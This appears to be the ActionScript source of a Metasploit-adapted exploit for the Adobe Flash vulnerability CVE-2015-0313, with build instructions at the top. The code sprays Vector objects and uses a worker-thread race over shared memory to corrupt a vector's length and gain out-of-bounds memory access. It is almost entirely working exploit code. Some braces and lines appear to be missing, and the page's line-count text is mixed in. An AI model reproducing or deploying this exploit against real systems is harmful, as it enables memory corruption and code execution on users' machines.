109 lines
3.4 KiB
109 lines
3.4 KiB
// Build how to:
// 1. Download the AIRSDK, and use its compiler.
// 2. Be support to support 16.0 as target-player (flex-config.xml).
// 3. Download the Flex SDK (4.6)
// 4. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
// (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
// 5. Build with: mxmlc -o msf.swf Main.as
// Original code by @hdarwin89 // http://hacklab.kr/flash-cve-2015-0313-%EB%B6%84%EC%84%9D/
// Modified to be used from msf
import flash.display.Sprite
import flash.display.LoaderInfo
import flash.events.Event
import flash.utils.ByteArray
import flash.system.Worker
import flash.system.WorkerDomain
import flash.system.MessageChannel
import flash.system.ApplicationDomain
import avm2.intrinsics.memory.casi32
import mx.utils.Base64Decoder
public class Main extends Sprite
private var ov:Vector.<Object> = new Vector.<Object>(80000)
private var uv:Vector.<uint>
private var ba:ByteArray = new ByteArray()
private var worker:Worker
private var mc:MessageChannel
private var b64:Base64Decoder = new Base64Decoder()
private var payload:String = ""
public function Main()
if (Worker.current.isPrimordial) mainThread()
else workerThread()
private function mainThread():void
// var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
// var pattern:RegExp = / /g;
// b64_payload = b64_payload.replace(pattern, "+")
// b64.decode(b64_payload)
// payload = b64.toByteArray().toString()
ba.length = 0x1000
ba.shareable = true
for (var i:uint = 0; i < ov.length; i++) {
ov[i] = new Vector.<uint>(1014)
ov[i][0] = 0xdeedbeef
for (i = 0; i < ov.length / 2; i += 2) {
worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes)
mc = worker.createMessageChannel(Worker.current)
mc.addEventListener(Event.CHANNEL_MESSAGE, onMessage)
worker.setSharedProperty("mc", mc)
worker.setSharedProperty("ba", ba)
ApplicationDomain.currentDomain.domainMemory = ba
private function workerThread():void
var ba:ByteArray = Worker.current.getSharedProperty("ba")
var mc:MessageChannel = Worker.current.getSharedProperty("mc")
ov[0] = new Vector.<uint>(1022)
while (mc.messageAvailable);
for (var i:uint = 0; i < 20000; i++) {
if (ov[0][i] == 1014 && ov[0][i + 2] == 0xdeedbeef) {
ov[0][i] = 0xffffffff
ov[0][0xfffffffe] = 1014
private function onMessage(e:Event):void
Logger.log("[*] onMessage")
var mod:uint = casi32(0, 1022, 0xFFFFFFFF)
Logger.log("[*] onMessage - mod: " + mod.toString())
if (mod == 1022) mc.receive()
else {
Logger.log("[*] onMessage - Searching corrupted vector...")
for (var i:uint = 0; i < ov.length; i++) {
if (ov[i].length == 0xffffffff) {
uv = ov[i]
} else {
ov[i] = null
if (uv == null) {
Logger.log("not found")
Logger.log('whooray: ' + uv.length.toString(16))